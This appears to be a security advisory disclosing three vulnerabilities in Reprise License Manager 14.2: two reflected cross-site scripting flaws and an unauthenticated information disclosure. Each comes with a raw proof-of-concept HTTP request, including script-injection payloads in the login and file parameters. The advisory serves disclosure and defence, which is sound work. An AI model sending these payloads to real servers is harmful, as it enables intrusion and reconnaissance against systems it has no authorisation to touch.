CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting

Multiple Vulnerabilities in Reprise License Manager 14.2Credit: Giulia Melotti Garibaldi//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28363# Vulnerability Title: Reflected Cross-Site Scripting# Severity: Medium# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goform/login_process/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28364# Vulnerability Title: Authenticated Reflected Cross-Site Scripting# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goforms/rlmswitchrCookie: REDACTED/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28365# Vulnerability Title: Unauthenticated Information Disclosure# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.Vulnerability PoC:GET http://HOST:5054/goforms/rlminfo HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveContent-Length: 0//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////